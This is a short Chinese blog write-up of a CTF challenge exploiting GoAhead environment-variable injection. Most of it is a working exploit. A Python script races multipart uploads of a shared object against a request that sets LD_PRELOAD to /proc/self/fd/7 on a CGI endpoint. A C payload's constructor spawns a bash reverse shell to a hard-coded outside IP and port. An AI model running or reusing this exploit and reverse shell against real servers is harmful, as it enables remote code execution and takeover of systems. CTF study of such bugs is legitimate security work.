看了下居然一个月没有更新博客了,赶快把最近的比赛搬出来水一水
ACTF居然在我期末周考试,然后我还要预习那些考试科目,所以阿,只做了一题,V&N的烨师傅尝试做第二题,思路有了但是没有时间做。
这一题呢主要是通过GoAhead环境变量注入
在做题之前呢,搜了下,找到了一篇相关的Vulhub漏洞复现的文章
具体的就这些
Github-exploits
exp.py
import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder
hack_so = open('hack.so','rb').read()
def upload(url):
m = MultipartEncoder(
fields = {
'file':('1.txt', hack_so,'application/octet-stream')
}
)
r = requests.post(
url = url,
data=m,
headers={'Content-Type': m.content_type}
)
def include(url):
m = MultipartEncoder(
fields = {
'LD_PRELOAD': '/proc/self/fd/7',
}
)
r = requests.post(
url = url,
data=m,
headers={'Content-Type': m.content_type}
)
def race(method):
url = 'http://localhost:10218/cgi-bin/hello'
if method == 'include':
include(url)
else:
upload(url)
def main():
task = ['upload','include'] * 1000
random.shuffle(task) #
with futures.ThreadPoolExecutor(max_workers=5) as executor:
results = list(executor.map(race, task))
if __name__ == "__main__":
main()hack.c
#include
#include
#include
__attribute__ ((__constructor__)) void aaanb(void)
{
unsetenv("LD_PRELOAD");
system("touch /tmp/success");
system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
} hack.so
github上自行提取
